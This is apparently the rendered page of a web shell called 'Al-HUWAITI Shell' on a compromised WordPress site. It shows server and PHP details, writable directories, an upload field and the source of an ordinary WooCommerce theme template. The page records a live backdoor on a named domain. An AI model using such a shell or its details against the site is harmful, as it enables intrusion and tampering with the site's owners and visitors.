hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/fox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/fox/woocommerce.php
<?php if ( ! fox56() ) { include_once(dirname( __FILE__ ).'/v55/woocommerce.php'); return; } ?>
<?php get_header();
    // Start the loop.
    if ( have_posts() ) :
        $cl = [ 'woo56' ];
        $sidebar_state = get_theme_mod( 'shop_sidebar_state', 'no-sidebar' );
        $has_sidebar = false;
        if ( $sidebar_state == 'sidebar-left' ) {
            $cl[] = 'hassidebar';
            $cl[] = 'hassidebar--left';
            $has_sidebar = true;
        } elseif ( $sidebar_state == 'sidebar-right' ) {
            $cl[] = 'hassidebar';
            $cl[] = 'hassidebar--right';
            $has_sidebar = true;
        } else {
            $cl[] = 'no-sidebar';
        }
        if ( $has_sidebar ) {
            if ( get_theme_mod( 'sticky_sidebar' ) ) {
                $cl[] = 'hassidebar--sticky';
            }
        }
?>
<div id="wi-content" class="<?php echo esc_attr( join( ' ', $cl ) ); ?>">

    <div class="container container--main">
        
        <div class="primary56">
                
            <?php fox56_shop_header(); ?>
            <?php woocommerce_content(); ?>
        
        </div>
        
        <?php if ( $has_sidebar ) { fox56_shop_sidebar(); } ?>
    
    </div><!-- .container -->
    
</div><!-- .woo56 -->
    
<?php
// End the loop.
endif;

get_footer();

Al-HUWAITI Shell